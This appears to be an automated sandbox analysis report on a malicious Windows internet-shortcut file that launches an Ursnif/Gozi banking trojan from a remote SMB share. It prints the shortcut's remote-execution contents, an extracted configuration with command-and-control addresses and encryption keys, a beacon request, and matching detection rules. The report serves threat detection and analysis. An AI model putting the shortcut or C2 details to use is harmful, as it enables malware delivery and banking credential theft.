Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
marzo.txt.url

Overview

General Information

Sample Name:marzo.txt.url
Analysis ID:826967
MD5:d8dc17b22192b297073d5749a7b49966
SHA1:606fd516fb85a0fbaa3a2b7ea92feffd5ae41b99
SHA256:f7b7f524138f10ad3b0d8145997db4ee5c90e7d8f76281cfc4a32bc427833236
Infos:

Detection

Ursnif
Score:88
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Yara detected Ursnif
Detected unpacking (changes PE section rights)
Snort IDS alert for network traffic
Writes or reads registry keys via WMI
Found malicious URL file
Writes registry values via WMI
Opens network shares
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Contains functionality to call native functions
IP address seen in connection with other malware
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Found evasive API chain checking for process token information
Creates a window with clipboard capturing capabilities
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Uses Microsoft's Enhanced Cryptographic Provider

Classification

  • System is w10x64_ra
  • OUTLOOK.EXE (PID: 6104 cmdline: "C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE" /PIM NoEmail MD5: CA3FDE8329DE07C95897DB0D828545CD)
  • server.exe (PID: 6612 cmdline: "\\46.8.19.120\Agenzia\server.exe" MD5: C29870BA33B8691967B100BC30572BB7)
  • server.exe (PID: 6832 cmdline: "\\46.8.19.120\Agenzia\server.exe" MD5: C29870BA33B8691967B100BC30572BB7)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Gozi, Ursnif2000 Ursnif aka Snifula2006 Gozi v1.0, Gozi CRM, CRM, Papras2010 Gozi v2.0, Gozi ISFB, ISFB, Pandemyia(*)-> 2010 Gozi Prinimalka -> Vawtrak/NeverquestIn 2006, Gozi v1.0 ('Gozi CRM' aka 'CRM') aka Papras was first observed.It was offered as a CaaS, known as 76Service. This first version of Gozi was developed by Nikita Kurmin, and he borrowed code from Ursnif aka Snifula, a spyware developed by Alexey Ivanov around 2000, and some other kits. Gozi v1.0 thus had a formgrabber module and often is classified as Ursnif aka Snifula.In September 2010, the source code of a particular Gozi CRM dll version was leaked, which led to Vawtrak/Neverquest (in combination with Pony) via Gozi Prinimalka (a slightly modified Gozi v1.0) and Gozi v2.0 (aka 'Gozi ISFB' aka 'ISFB' aka Pandemyia). This version came with a webinject module.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.gozi
{"RSA Public Key": "ScCitKVnthsrIejolA7zuBWvwII2di/DH3GlyTtkQAl5+NYn11P8hoApgIAx8QgiEaRicK3ETZq3j2ua44XjJevEH0XzzTqZAT3wkYswDxrBkgZMCwo6YXkhXitvoh3eARDtRDEkQsoLHZ9GnSskgPPZhcXZcW5DEVGUxmtbXgDaTXEEASp94TxsSTq8LcHFcoUD/3qCUIKISKD7sIV0hgpJQ8kx5Fr/zREoX54YDyuxKi/xJ3SBIavWF9UPU+YwvxpBDYMFrMsKJrjGUlpoQZehisJjttb1cTtggelEGnFr5O2GXefQUuwrSizDeVnMRSAHdds+AiqlPxEl1nFzSfnHhHtw7Ql8JtPTws7Z1Ho=", "c2_domain": ["checklist.skype.com", "5.44.43.17", "31.41.44.108", "62.173.138.213", "109.248.11.174"], "botnet": "7714", "server": "50", "serpent_key": "lk8hY4nisKQzZKXE", "sleep_time": "1", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0"}
SourceRuleDescriptionAuthorStrings
marzo.txt.urlMethodology_Suspicious_Shortcut_SMB_URLDetects remote SMB path for .URL persistence@itsreallynick (Nick Carr), @QW5kcmV3 (Andrew Thompson)
  • 0x35:$file: URL=file://4
  • 0x8a:$url_clsid: [{000214A0-0000-0000-C000-000000000046}]
  • 0x0:$url_explicit: [InternetShortcut]
SourceRuleDescriptionAuthorStrings
00000005.00000002.2851808327.0000000005458000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
    00000005.00000002.2851808327.0000000005458000.00000004.00000020.00020000.00000000.sdmpWindows_Trojan_Gozi_fd494041unknownunknown
    • 0x1238:$a1: /C ping localhost -n %u && del "%s"
    • 0xeb8:$a2: /C "copy "%s" "%s" /y && "%s" "%s"
    • 0xf10:$a3: /C "copy "%s" "%s" /y && rundll32 "%s",%S"
    • 0xaac:$a5: filename="%.4u.%lu"
    • 0x64a:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s
    • 0x886:$a8: %08X-%04X-%04X-%04X-%08X%04X
    • 0xbc7:$a8: %08X-%04X-%04X-%04X-%08X%04X
    • 0xe7d:$a9: &whoami=%s
    • 0xe66:$a10: %u.%u_%u_%u_x%u
    • 0xd73:$a11: size=%u&hash=0x%08x
    • 0xb2d:$a12: &uptime=%u
    • 0x70b:$a13: %systemroot%\system32\c_1252.nls
    • 0x12a8:$a14: IE10RunOnceLastShown_TIMESTAMP
    00000005.00000002.2851808327.0000000005458000.00000004.00000020.00020000.00000000.sdmpWindows_Trojan_Gozi_261f5ac5unknownunknown
    • 0xb64:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x
    • 0x64a:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s
    • 0xa78:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu"
    • 0xd02:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s)
    • 0xda6:$a9: Software\AppDataLow\Software\Microsoft\
    • 0x1cc0:$a9: Software\AppDataLow\Software\Microsoft\
    00000003.00000003.2478797463.0000000005588000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
      00000003.00000003.2478797463.0000000005588000.00000004.00000020.00020000.00000000.sdmpWindows_Trojan_Gozi_fd494041unknownunknown
      • 0x1238:$a1: /C ping localhost -n %u && del "%s"
      • 0xeb8:$a2: /C "copy "%s" "%s" /y && "%s" "%s"
      • 0xf10:$a3: /C "copy "%s" "%s" /y && rundll32 "%s",%S"
      • 0xaac:$a5: filename="%.4u.%lu"
      • 0x64a:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s
      • 0x886:$a8: %08X-%04X-%04X-%04X-%08X%04X
      • 0xbc7:$a8: %08X-%04X-%04X-%04X-%08X%04X
      • 0xe7d:$a9: &whoami=%s
      • 0xe66:$a10: %u.%u_%u_%u_x%u
      • 0xd73:$a11: size=%u&hash=0x%08x
      • 0xb2d:$a12: &uptime=%u
      • 0x70b:$a13: %systemroot%\system32\c_1252.nls
      • 0x12a8:$a14: IE10RunOnceLastShown_TIMESTAMP
      Click to see the 13 entries
      No Sigma rule has matched
      Timestamp:192.168.2.35.44.43.1749733802033203 03/15/23-12:33:08.360785
      SID:2033203
      Source Port:49733
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.35.44.43.1749733802033204 03/15/23-12:33:08.360785
      SID:2033204
      Source Port:49733
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected

      Click to jump to signature section

      Show All Signature Results
      Source: 00000003.00000003.1591519881.0000000002B70000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: Ursnif {"RSA Public Key": "ScCitKVnthsrIejolA7zuBWvwII2di/DH3GlyTtkQAl5+NYn11P8hoApgIAx8QgiEaRicK3ETZq3j2ua44XjJevEH0XzzTqZAT3wkYswDxrBkgZMCwo6YXkhXitvoh3eARDtRDEkQsoLHZ9GnSskgPPZhcXZcW5DEVGUxmtbXgDaTXEEASp94TxsSTq8LcHFcoUD/3qCUIKISKD7sIV0hgpJQ8kx5Fr/zREoX54YDyuxKi/xJ3SBIavWF9UPU+YwvxpBDYMFrMsKJrjGUlpoQZehisJjttb1cTtggelEGnFr5O2GXefQUuwrSizDeVnMRSAHdds+AiqlPxEl1nFzSfnHhHtw7Ql8JtPTws7Z1Ho=", "c2_domain": ["checklist.skype.com", "5.44.43.17", "31.41.44.108", "62.173.138.213", "109.248.11.174"], "botnet": "7714", "server": "50", "serpent_key": "lk8hY4nisKQzZKXE", "sleep_time": "1", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0"}
      Source: \Device\Mup\46.8.19.120\Agenzia\server.exeCode function: 3_2_02B81508 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,
      Source: \Device\Mup\46.8.19.120\Agenzia\server.exeCode function: 5_2_02BE1508 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,

      Networking

      barindex
      Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49733 -> 5.44.43.17:80
      Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49733 -> 5.44.43.17:80
      Source: Joe Sandbox ViewASN Name: MGNHOST-ASRU MGNHOST-ASRU
      Source: Joe Sandbox ViewIP Address: 192.229.221.95 192.229.221.95
      Source: global trafficHTTP traffic detected: GET /drew/ZSasVN0fLMcptc05TEVCa/mWgPW7Eo_2Fhz8Y6/Fz7ovUnPPN6ieZv/4FY_2FkRwgHKarRxmu/cK8VWt8GQ/Zc6hXPYvHVnVEinmxGwG/FbxcbjsVVBkkkF087h8/0Bw_2FBX6oYzh4Vz7I7V6u/xxtFlXc0f1lZa/ReLwGc75/TgOyVXs_2BG_2Ff5dq8IUPJ/_2B5Dzbadz/pCrKzEKZvmMD7pEh0/5p7osKVJqMAc/da4zdGlXLsX/CQJtG1bn92QsJL/_2BNPELQUnUqT0_2B_2B2/nFFFAPeD9EV0WvEI/yBuQ4L9zF/_2Bt.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 5.44.43.17Connection: Keep-AliveCache-Control: no-cache
      Source: unknownDNS traffic detected: query: checklist.skype.com replaycode: Name error (3)
      Source: unknownTCP traffic detected without corresponding DNS query: 192.229.221.95
      Source: unknownTCP traffic detected without corresponding DNS query: 192.229.221.95
      Source: unknownTCP traffic detected without corresponding DNS query: 192.229.221.95
      Source: unknownTCP traffic detected without corresponding DNS query: 192.229.221.95
      Source: unknownTCP traffic detected without corresponding DNS query: 192.229.221.95
      Source: unknownTCP traffic detected without corresponding DNS query: 192.229.221.95
      Source: unknownTCP traffic detected without corresponding DNS query: 192.229.221.95
      Source: unknownTCP traffic detected without corresponding DNS query: 5.44.43.17
      Source: unknownTCP traffic detected without corresponding DNS query: 5.44.43.17
      Source: unknownTCP traffic detected without corresponding DNS query: 5.44.43.17
      Source: unknownTCP traffic detected without corresponding DNS query: 5.44.43.17
      Source: unknownTCP traffic detected without corresponding DNS query: 5.44.43.17
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: server.exe, 00000003.00000002.2850791743.0000000002D87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://5.44.43.17/
      Source: server.exe, 00000003.00000002.2850791743.0000000002D87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://5.44.43.17/b2c5-fe065076e0a1
      Source: server.exe, 00000003.00000002.2850791743.0000000002DA6000.00000004.00000020.00020000.00000000.sdmp, server.exe, 00000003.00000002.2850791743.0000000002DBB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://5.44.43.17/drew/ZSasVN0fLMcptc05TEVCa/mWgPW7Eo_2Fhz8Y6/Fz7ovUnPPN6ieZv/4FY_2FkRwgHKarRxmu/cK8
      Source: server.exe, 00000003.00000002.2850791743.0000000002DA6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://5.44.43.17/~
      Source: server.exe, 00000003.00000002.2850791743.0000000002DA6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://checklist.skype.com/drew/XaKJ910OZ6OkzOiEp1j_2/BGdUIBHp_2FM8Z2X/fEGunvRWGFrRGJ9/FM827N5CFAo37
      Source: server.exe, 00000005.00000002.2850719337.0000000002CB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://checklist.skype.com/drew/p8a6EJ5vt4U/NrIUl_2BZrXy6_/2BoMtuVkg7FYSQnXs7vFZ/T_2BtMhNb_2F_2Bq/Vr
      Source: unknownDNS traffic detected: queries for: checklist.skype.com
      Source: global trafficHTTP traffic detected: GET /drew/ZSasVN0fLMcptc05TEVCa/mWgPW7Eo_2Fhz8Y6/Fz7ovUnPPN6ieZv/4FY_2FkRwgHKarRxmu/cK8VWt8GQ/Zc6hXPYvHVnVEinmxGwG/FbxcbjsVVBkkkF087h8/0Bw_2FBX6oYzh4Vz7I7V6u/xxtFlXc0f1lZa/ReLwGc75/TgOyVXs_2BG_2Ff5dq8IUPJ/_2B5Dzbadz/pCrKzEKZvmMD7pEh0/5p7osKVJqMAc/da4zdGlXLsX/CQJtG1bn92QsJL/_2BNPELQUnUqT0_2B_2B2/nFFFAPeD9EV0WvEI/yBuQ4L9zF/_2Bt.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 5.44.43.17Connection: Keep-AliveCache-Control: no-cache

      Key, Mouse, Clipboard, Microphone and Screen Capturing

      barindex
      Source: Yara matchFile source: 00000005.00000002.2851808327.0000000005458000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000003.2478797463.0000000005588000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000002.2851937676.0000000005588000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: server.exe PID: 6612, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: server.exe PID: 6832, type: MEMORYSTR
      Source: C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXEWindow created: window name: CLIPBRDWNDCLASS

      E-Banking Fraud

      barindex
      Source: Yara matchFile source: 00000005.00000002.2851808327.0000000005458000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000003.2478797463.0000000005588000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000002.2851937676.0000000005588000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: server.exe PID: 6612, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: server.exe PID: 6832, type: MEMORYSTR
      Source: \Device\Mup\46.8.19.120\Agenzia\server.exeCode function: 3_2_02B81508 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,
      Source: \Device\Mup\46.8.19.120\Agenzia\server.exeCode function: 5_2_02BE1508 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,

      System Summary

      barindex
      Source: 00000005.00000002.2851808327.0000000005458000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
      Source: 00000005.00000002.2851808327.0000000005458000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
      Source: 00000003.00000003.2478797463.0000000005588000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
      Source: 00000003.00000003.2478797463.0000000005588000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
      Source: 00000005.00000002.2850616986.0000000002C51000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
      Source: 00000003.00000002.2850703923.0000000002D4C000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
      Source: 00000003.00000002.2851937676.0000000005588000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
      Source: 00000003.00000002.2851937676.0000000005588000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
      Source: 00000003.00000002.2849985060.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
      Source: Process Memory Space: server.exe PID: 6612, type: MEMORYSTRMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
      Source: Process Memory Space: server.exe PID: 6612, type: MEMORYSTRMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
      Source: Process Memory Space: server.exe PID: 6832, type: MEMORYSTRMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
      Source: Process Memory Space: server.exe PID: 6832, type: MEMORYSTRMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
      Source: \Device\Mup\46.8.19.120\Agenzia\server.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
      Source: \Device\Mup\46.8.19.120\Agenzia\server.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
      Source: \Device\Mup\46.8.19.120\Agenzia\server.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
      Source: \Device\Mup\46.8.19.120\Agenzia\server.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
      Source: \Device\Mup\46.8.19.120\Agenzia\server.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
      Source: \Device\Mup\46.8.19.120\Agenzia\server.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
      Source: \Device\Mup\46.8.19.120\Agenzia\server.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
      Source: \Device\Mup\46.8.19.120\Agenzia\server.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
      Source: marzo.txt.urlInitial sample: [InternetShortcut]IconIndex=70HotKey=0IDList=URL=file://46.8.19.120/Agenzia/server.exeIconFile=C:\Windows\system32\SHELL32.dll[{000214A0-0000-0000-C000-000000000046}]Prop3=19,9
      Source: \Device\Mup\46.8.19.120\Agenzia\server.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
      Source: \Device\Mup\46.8.19.120\Agenzia\server.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
      Source: \Device\Mup\46.8.19.120\Agenzia\server.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
      Source: \Device\Mup\46.8.19.120\Agenzia\server.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
      Source: \Device\Mup\46.8.19.120\Agenzia\server.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
      Source: \Device\Mup\46.8.19.120\Agenzia\server.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
      Source: marzo.txt.url, type: SAMPLEMatched rule: Methodology_Suspicious_Shortcut_SMB_URL author = @itsreallynick (Nick Carr), @QW5kcmV3 (Andrew Thompson), description = Detects remote SMB path for .URL persistence, score = 27.09.2019, sample = e0bef7497fcb284edb0c65b59d511830, reference = https://twitter.com/cglyer/status/1176184798248919044
      Source: 00000005.00000002.2851808327.0000000005458000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
      Source: 00000005.00000002.2851808327.0000000005458000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
      Source: 00000003.00000003.2478797463.0000000005588000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
      Source: 00000003.00000003.2478797463.0000000005588000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
      Source: 00000005.00000002.2850616986.0000000002C51000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
      Source: 00000003.00000002.2850703923.0000000002D4C000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
      Source: 00000003.00000002.2851937676.0000000005588000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
      Source: 00000003.00000002.2851937676.0000000005588000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
      Source: 00000003.00000002.2849985060.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
      Source: Process Memory Space: server.exe PID: 6612, type: MEMORYSTRMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
      Source: Process Memory Space: server.exe PID: 6612, type: MEMORYSTRMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
      Source: Process Memory Space: server.exe PID: 6832, type: MEMORYSTRMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
      Source: Process Memory Space: server.exe PID: 6832, type: MEMORYSTRMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
      Source: \Device\Mup\46.8.19.120\Agenzia\server.exeCode function: 3_2_02B816DF
      Source: \Device\Mup\46.8.19.120\Agenzia\server.exeCode function: 3_2_02B81D8A
      Source: \Device\Mup\46.8.19.120\Agenzia\server.exeCode function: 3_2_02B8832C
      Source: \Device\Mup\46.8.19.120\Agenzia\server.exeCode function: 5_2_02BE16DF
      Source: \Device\Mup\46.8.19.120\Agenzia\server.exeCode function: 5_2_02BE1D8A
      Source: \Device\Mup\46.8.19.120\Agenzia\server.exeCode function: 5_2_02BE832C
      Source: \Device\Mup\46.8.19.120\Agenzia\server.exeCode function: 3_2_02B8421F NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,
      Source: \Device\Mup\46.8.19.120\Agenzia\server.exeCode function: 3_2_02B88551 NtQueryVirtualMemory,
      Source: \Device\Mup\46.8.19.120\Agenzia\server.exeCode function: 5_2_02BE421F NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,
      Source: \Device\Mup\46.8.19.120\Agenzia\server.exeSection loaded: msvcr100.dll
      Source: \Device\Mup\46.8.19.120\Agenzia\server.exeSection loaded: msvcr100.dll
      Source: \Device\Mup\46.8.19.120\Agenzia\server.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: unknownProcess created: \Device\Mup\46.8.19.120\Agenzia\server.exe "\\46.8.19.120\Agenzia\server.exe"
      Source: unknownProcess created: \Device\Mup\46.8.19.120\Agenzia\server.exe "\\46.8.19.120\Agenzia\server.exe"
      Source: \Device\Mup\46.8.19.120\Agenzia\server.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
      Source: C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\FeedbackJump to behavior
      Source: classification engineClassification label: mal88.troj.spyw.evad.winURL@2/3@2/2
      Source: \Device\Mup\46.8.19.120\Agenzia\server.exeCode function: 3_2_02B830D5 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,
